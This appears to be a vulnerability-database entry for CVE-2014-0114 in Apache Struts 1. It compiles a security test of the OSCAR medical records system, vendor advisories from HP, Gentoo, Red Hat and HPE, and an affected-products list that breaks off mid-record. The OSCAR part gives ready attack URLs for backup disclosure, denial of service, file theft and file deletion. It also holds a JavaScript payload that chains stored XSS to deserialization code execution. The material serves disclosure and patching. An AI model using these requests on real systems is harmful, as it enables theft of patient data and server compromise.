OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery
Issue details:
=== OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency ===
OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114.
An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster
Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz
An unauthenticated attacker is prevented from doing likewise by the "LoginFilter" servlet filter, but can still carry out a denial-of-service attack, impeding any access to the application until Tomcat is restarted, by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid
=== OVE-20160329-0003: Remote code execution via unsafe object deserialization ===
TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial.
In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception: "org.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defined", but were it to be accessible, it would be vulnerable as well.
=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface ===
logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003:
var decodedBase64 = atob("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"); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData);
XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested)
=== OVE-20160329-0007: SQL injection ===
On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators.
=== OVE-20160329-0008: Path traversal ===
ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename).
Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz
An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp
=== OVE-20160329-0002: Insecure direct object reference in document manager ===
ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private.
=== OVE-20160329-0005: Denial of service via resource exhaustion ===
uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition).
=== OVE-20160329-0006: Insecure password storage ===
Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack.
=== OVE-20160329-0009: Cross-site request forgery ===
The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004.
References:
CVE-2014-0114 (SSRT101662)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
SiteScope Affected version Resolution patch details Link to download
11.1x SiteScope 11.13 Windows 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00315
SiteScope 11.13 Windows 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00316
SiteScope 11.13 Linux 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00317
SiteScope 11.13 Linux 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00318
SiteScope 11.13 Solaris 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00319
SiteScope 11.13 Solaris 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00320
11.2x SiteScope 11.24.271 Intermediate Patch for Windows 32bit and 64bit http://support.openview.hp.com/selfsolve/document/LID/SIS_00321
SiteScope 11.24.271 Intermediate Patch for Windows 32bit on 64bit http://support.openview.hp.com/selfsolve/document/LID/SIS_00322
SiteScope 11.24.271 Intermediate Patch for Linux http://support.openview.hp.com/selfsolve/document/LID/SIS_00323
SiteScope 11.24.271 Intermediate Patch for Solaris http://support.openview.hp.com/selfsolve/document/LID/SIS_00324
HISTORY Version:1 (rev.1) - 12 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201607-09
https://security.gentoo.org/
Severity: Normal Title: Commons-BeanUtils: Arbitrary code execution Date: July 20, 2016 Bugs: #534498 ID: 201607-09
Synopsis
Apache Commons BeanUtils does not properly suppress the class property, which could lead to the remote execution of arbitrary code.
Workaround
There is no known workaround at this time.
Resolution
All Commons BeanUtils users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2"
References
[ 1 ] CVE-2014-0114 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-09
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat A-MQ Broker 7.5 release and security update Advisory ID: RHSA-2019:2995-01 Product: Red Hat JBoss AMQ Advisory URL: https://access.redhat.com/errata/RHSA-2019:2995 Issue date: 2019-10-10 Keywords: amq,messaging,integration,broker Cross references: RHEA-2019:45713-01 CVE Names: CVE-2014-0114 ==================================================================== 1. Summary:
Red Hat A-MQ Broker 7.5 is now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms.
This release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red Hat A-MQ Broker 7.4.1, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.
Security Fix(es):
- Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link (you must log in to download the update).
- Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters
- JIRA issues fixed (https://issues.jboss.org/):
ENTMQBR-2849 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters [amq-7.4.0]
- References:
https://access.redhat.com/security/cve/CVE-2014-0114 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.5.0 https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXZ7b4tzjgjWX9erEAQhy1BAAlZY3SIVWWf78mbhIhS4x+DCzq6s6W+B7 gh7bSOfLCqLNVyuqI99PH920CgZwtrN01VVt2by822MdIKKKHtbjFTzstm1ucLso QlYBLkmPzkC0xGPP4q67EDhr5KctJ4wlkerTnBhfwJxvFBLZnWzgGvmawbf3X7iQ qWwigzfVjiUwen7pv5Bol4WkzhTbvUxPEVDS696ziJI0zPyqnnDXpl+9lnXcYL0m GLsD59I984+gLxpl9fzgOPZxm2U1gGusO5rM9vUPmGX06XJo1nsUKUuhRfLoNwQm YcK6yVFE+TAOAKbmM2o62hnA/+UemV/bBQJh3ymVgjcHSz8UYae4vfmiPfiyBsVv STakDzO5yz+htMLJWVAnHjLEgbcGgzrH7jqXLzNO47bZR0oVVP6RjZnsZCdhxeT7 mPZtwWSVHFl8GRriGvEKQjC27Majwva5Hnwh82IPr5lgbLpWmvQSBzDHIObdyPts UYk+zBhZHNXzdQrnEA2BzhsXehZiMigKefutBPPEc+iXjFsLSTmGYceECyhUP/No RuQTYanb0GdgPDpgCOoDIgPtY3VyMiCur8BkQKGIyJt4aXdSaBoqAXt4KypAFExG lRVXHA8RRVcnqsxcpCA+VesIbPuTzmCSsgkQckv/TGLFgdAMLOA4J38bUCjulvMm 9D+Pu+r8KbU=kdcn -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05324755 Version: 1
HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-11-04 Last Updated: 2016-11-04
Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential vulnerabilities have been identified in HPE SiteScope. The vulnerabilities could be exploited to allow local elevation of privilege and exploited remotely to allow denial of service, arbitrary code execution, cross-site request forgery.
References:
- CVE-2014-0114 - Apache Struts, execution of arbitrary code
- CVE-2016-0763 - Apache Tomcat, denial of service (DoS)
- CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions
- CVE-2015-3253 - Apache Groovy, execution of arbitrary code
- CVE-2015-5652 - Python, elevation of privilege
- CVE-2013-6429 - Spring Framework, cross-site request forgery
- CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)
- PSRT110264
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HP SiteScope Monitors Software Series 11.2x–11.32IP1
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2013-6429
6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-0050
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0107
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0114
6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-3253
7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-5652
8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-0763
6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has provided a resolution via an update to HPE SiteScope. Details on the update and each vulnerability are in the KM articles below.
Note: The resolution for each vulnerability listed is to upgrade to SiteScope 11.32IP2 or an even more recent version of SiteScope if available. The SiteScope update can be found in the personal zone in "my updates" in HPE Software Support Online: https://softwaresupport.hpe.com.
-
Apache Commons FileUpload: KM02550251 (CVE-2014-0050):
-
Apache Struts: KM02553983 (CVE-2014-0114):
-
Apache Tomcat: KM02553990 (CVE-2016-0763):
-
Apache XML Xalan: KM02553991 (CVE-2014-0107):
-
Apache Groovy: KM02553992 (CVE-2015-3253):
-
Python: KM02553997 (CVE-2015-5652):
-
Spring Framework: KM02553998 (CVE-2013-6429):
HISTORY Version:1 (rev.1) - 4 November 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Thanks to the efforts of Alvaro Munoz and the HP Fortify team, the Apache Struts project team can recommend a first mitigation that is relatively simple to apply. It introduces a generic Servlet filter that can blacklist unacceptable request parameters based on regular expressions. Please see the corresponding HP Fortify blog entry [2] for detailed instructions. Based on this information, the Apache Struts project team recommends applying the mitigation advice immediately to all Struts 1-based applications.
The End-Of-Life of Struts 1 was announced more than one year ago [3]. However, in a cross-project effort, the Struts team is looking for a correction or an improved mitigation path. Please stay tuned for further information regarding a solution.
This is a cross-list posting. If you have questions regarding this report, please direct them to security@struts.apache.org only.
[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html [2] http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro [3] http://struts.apache.org/struts1eol-announcement.html
-- René Gielen http://twitter.com/rgielen
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0288", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.4", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.7", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.6", }, { model: "struts", scope: "eq", trust: 
1.9, vendor: "apache", version: "1.3.10", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.2", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.1", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.3.5", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.8", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.3.8", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "1.2.9", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.8, vendor: "hitachi", version: "-09-00-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-50-03", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-50-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-10-10", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-00-12", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-08-50-13", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-08-50-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-10-00-03", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-10-00-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 1.5, vendor: "hitachi", version: "-09-10-00", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "1.0.2", }, { model: "tiered storage manager software -00 )", scope: "eq", trust: 1.2, vendor: "hitachi", version: "7.1.1", }, { model: "tiered storage manager software )", scope: "eq", 
trust: 1.2, vendor: "hitachi", version: "7.3-00", }, { model: "commons beanutils", scope: "lte", trust: 1, vendor: "apache", version: "1.9.1", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "1.0", }, { model: "device manager software -00 )", scope: "eq", trust: 0.9, vendor: "hitachi", version: "7.3", }, { model: "device manager software )", scope: "eq", trust: 0.9, vendor: "hitachi", version: "7.4-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.9, vendor: "hitachi", version: "-08-11-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.9, vendor: "hitachi", version: "-08-00-00", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-00", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-03", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-00", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-00", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-00", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-01", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-08-11-08", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-00", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-00", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-00", }, { model: "jp1/performance management manager web option", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-07-00", }, { model: 
"jp1/performance management web console", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-08-00-12", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-00", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-00", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-03", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-01", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-00", }, { model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "7.6.1-05", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-02", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-04", }, { model: "infosphere information server", scope: "eq", trust: 0.6, vendor: "ibm", version: "9.1", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-01", }, { model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "7.4.0-02", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-00", }, { model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "7.4.0-01", }, { model: "infosphere information server", scope: "eq", trust: 0.6, vendor: "ibm", version: "8.5", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.0-06", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-02", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-02", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.0-00", }, { 
model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "8.0.0-03", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-00", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-01", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.2-01", }, { model: "tuning manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "8.0.0-04", }, { model: "device manager software )", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-02", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-04", }, { model: "device manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "7.0.0-00", }, { model: "jp1/performance management manager web option", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-07-54", }, { model: "infosphere information server", scope: "eq", trust: 0.6, vendor: "ibm", version: "8.1", }, { model: "infosphere information server", scope: "eq", trust: 0.6, vendor: "ibm", version: "8.7", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-08-10-08", }, { model: "tiered storage manager software", scope: "eq", trust: 0.6, vendor: "hitachi", version: "6.1.1-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.6, vendor: "hitachi", version: "-08-10-00", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0.0.17", }, { model: "openpages", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0", }, { model: "device manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "retail allocation", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "13.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.3.0", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.6-00", }, { model: "security qradar", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tivoli storage manager administration center", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.3", }, { model: "tivoli workload scheduler z/os connector", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "records manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "retail clearance optimization engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.401", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "big-ip aam", scope: "eq", trust: 0.3, vendor: "f5", version: "11.5", }, { model: "social media analytics", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.3", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00", }, { model: "terasoluna server framework for java", scope: "ne", trust: 0.3, vendor: "ntt data", version: "2.0.5.2", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-00", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: 
"7.0.1-02", }, { model: "big-ip webaccelerator hf7", scope: "eq", trust: 0.3, vendor: "f5", version: "11.1.0", }, { model: "lotus expeditor", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "vcenter server", scope: "eq", trust: 0.3, vendor: "vmware", version: "5.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "business process manager standard", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "tivoli application dependency discovery manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1.2", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "device manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0-06(x64))", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "3.5.0", }, { model: "device manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "fuse esb enterprise", scope: "eq", trust: 0.3, vendor: "redhat", version: "7.1.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.43", }, { model: "ds8870", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: 